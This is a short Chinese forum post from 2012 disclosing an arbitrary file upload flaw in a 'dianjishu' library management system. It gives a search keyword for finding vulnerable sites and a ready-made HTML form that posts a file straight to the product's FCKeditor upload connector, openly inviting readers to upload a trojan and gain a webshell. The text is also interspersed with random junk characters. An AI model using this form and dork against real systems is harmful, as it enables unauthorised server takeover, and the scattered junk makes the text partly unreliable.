主题:图书馆系统任意文件上传漏洞
5 Q/ b+ M+ f# s, E 作者:冰锋刺客) Z' r5 w$ |9 ^! r) H8 Y" ^9 @
厂商:点击书(dianjishu.com)0 D6 Q. W3 X$ I( G4 L. k& V
日期:2012-6-21
9 a# @# \# S2 n9 ] ~+ T7 C9 h : E7 I+ G: M8 @4 _2 B
I 概述
$ ?; v! e6 e. p: l( C 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell, c: d- Z; x3 p/ ?1 B
II 简介
; R+ a! I! J* L; z* C/ d7 F% ~ 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
+ J) M' m7 y5 z8 [ 补充一个漏洞
5 z% j/ k" f9 \/ D2 M7 }* } i <form id="frmUpload" enctype="multipart/form-data"% o* t1 z% J s/ z
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>- @' E0 l- e( S( \
<input id="btnUpload" type="submit" value="操翻他">- S9 y% ]! n/ i
</form>- ]/ X) b! I0 U ^; J) X# N
你们懂的2 r" m& G) o( V* e- h" U" b
那傻逼提供还需要改包.* O9 W) A/ c+ U) [" a8 R i
自己看了下源代码发现fckeditor
+ `2 Q( K- O! c# l% e 直接秒杀7 }$ E( O2 }+ n) a; ^
|
发表于 2012-9-10 21:20:59
收藏
支持
反对